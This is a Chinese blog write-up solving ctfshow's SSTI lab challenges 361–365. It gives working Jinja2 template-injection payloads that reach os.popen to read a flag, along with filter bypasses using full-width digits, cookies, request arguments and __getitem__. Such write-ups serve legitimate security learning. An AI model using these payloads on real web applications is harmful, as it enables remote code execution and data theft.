2024年最全ctfshow web入门 SSTI

最新推荐文章于 2024-07-17 11:36:26 发布
最新推荐文章于 2024-07-17 11:36:26 发布
阅读量254 收藏 8
点赞数 4
分类专栏: 程序员 文章标签: 前端 服务器 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84265972/article/details/138364021
版权

payload

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()

362

传参试试

轮流试试每个数字,发现只有2和3被过滤

而且只要字符串不包括2和3就能显示

使用全角数字进行绕过

关闭使用半角输入模式

“1234567890”

payload:

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

363

数字没有被过滤掉

经过各种字母和符号尝试,发现会过滤“”

试试把“”进行url编码看看

还是会被过滤

但是传参会自动补齐双引号,所以索性不加了

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

364

它将arg过滤掉了,所以没有办法直接GET传参

改用Cookie传

GET传参

?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}

Cookie:

x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

365

尝试Jinja2模板注入

过滤单双引号、[、args

找一下os

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

在页面内查找

数出来是132

用__getitem__绕过中括号[过滤,request对象绕过引号''""过滤,cookie或者values绕过args过滤

得到:

{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}

还有Cookie传参

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84265972
关注
专栏目录
2024网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 969
任务环境说明:服务器场景:Server1。
ctfshow web入门(SSRF)
qq_53263789的博客
07-19 857
ctfshow
ctfshow~VIP限免题目20道(保姆级解析)
m0_75030189的博客
07-17 1302
ctfshow~VIP限免题目保姆级解析,感觉都过一遍确实也简单梳理了一些长时间不看忘了的知识点,如果文章有错误,欢迎大家批评指正!(又菜又爱玩的海鸥先生)
CTFSHOW~WEB入门
ing_end的博客
01-21 1301
WEB~4(2022.1.16) 看题目,提示我们查看robots.txt文件 注:什么是robots.txt文件?   搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。   您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。 robots.txt文件放在哪里? robots.txt文件应该放在...
CTFShow-Web入门
weixin_58546222的博客
12-15 857
CTFShow爆破解题思路
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1727
ctfshow web
[CTFSHOW][WEB入门]SSTI模版注入
fallingskies
10-14 498
web361 Flask是一个使用Python编写的轻量级web应用框架,其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2。 参考https://xz.aliyun.com/t/3679#toc-8https://xz.aliyun.com/t/3679#toc-8 使用poc进行测试 {{5*5}} 显然存在模版注入。 查找可以利用的类 {{"".__class__.__bases__[0].__subclasses__()}} 已知<class '...
ctfshow-web364(SSTI)
m0_62094846的博客
04-30 554
用上题的方法,发现还是有东西被过滤了 筛选后发现是args 过滤了引号和args,上题的姿势不能用了,但是可以用chr()函数绕过。 可以用这个payload判断chr()函数的位置: {{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}} 用bp跑后发现有这几个,可以任意取 取80 分析一下别人的wp(现在的水平也只能这样了) ?name={%...
ctfshow-web365(SSTI)
m0_62094846的博客
05-05 309
这次是把args [ 和' 过滤了 有两种方式可以绕过[ 可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__ ?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__
【网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 8942
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
ctfshow-web入门-信息搜集(web11-web20)
Welcome To Myon'Blog !
06-02 1398
X探针:又名刘海探针、X-Prober,是一款由 INN STUDIO 原创主导开发的开源 PHP 探针,拥有美观简洁的界面、极高的运行效率和极低的资源占用,能高精度显示服务器的相应信息。php 探针:用来探测空间、服务器运行状况和 PHP 信息,探针可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。雅黑 php 探针:每秒更新,不用刷网页,适用于Linux系统,可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。
ctfshow-web入门-信息搜集(web1-web10)
Welcome To Myon'Blog !
05-31 762
勇师傅还是想打 CTF。
ctfshow-web入门-ssti
K_kiii的博客
03-16 414
没有做任何过滤?出现了flag,然后cat../flag即可?
ctfshow-web入门-命令执行(web56、web57、web58)
Welcome To Myon'Blog !
06-29 811
由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37。命令执行,需要严格的过滤,已测试,可绕。
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2646
CTFShow-WEB入门篇--信息搜集详细Wp
ctfshow-web入门-命令执行(web30-web36)
Welcome To Myon'Blog !
06-06 1070
命令执行,需要严格的过滤。
ctfshow-web入门-文件上传(web166、web167)&(web168-web170)免杀绕过
Welcome To Myon'Blog !
07-11 1075
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
ctfshow-web入门-php特性(web109-web115)
Welcome To Myon'Blog !
07-15 1113
php 中查看目录的函数有:scandir()、golb()、dirname()、basename()、realpath()、getcwd() ,其中 scandir()、golb() 、dirname()、basename()、realpath() 都需要给定参数,而 getcwd() 不需要参数,getchwd() 函数会返回当前工作目录。对于 trim() 函数会去除空格( %20)、制表符(%09)、换行符(%0a)、回车符(%0d)、空字节符(%00)、垂直制表符(%0b),
ctfshow dockerfile
最新发布
08-30
CTFShow Dockerfile通常是指一个用于容器化(Containers)的安全挑战(Capture The Flag, CTF)环境的一种Docker构建文件。Dockerfile是一种文本文件,它包含了创建一个Docker镜像所需的所有指令。如果CTFShow是一个包含网络安全挑战的项目,Dockerfile会定义如何从基础镜像开始,安装必要的软件包、设置环境变量、复制必要的文件,以及运行特定的服务或工具。 例如,一个基本的CTFShow Dockerfile可能会这样编写: ```dockerfile # 使用官方的基础镜像作为起点 FROM ubuntu:latest # 更新包列表并安装必要的软件 RUN apt-get update && apt-get install -y \ nginx \ python3 \ python3-pip # 安装所需的Python库 RUN pip3 install Flask ctf-framework # 将本地目录的内容复制到容器内部 COPY . /app # 设置工作目录和运行命令 WORKDIR /app CMD ["python3", "app.py"] ``` 这个Dockerfile会让镜像启动一个基于Flask的web服务器,用于展示CTF挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值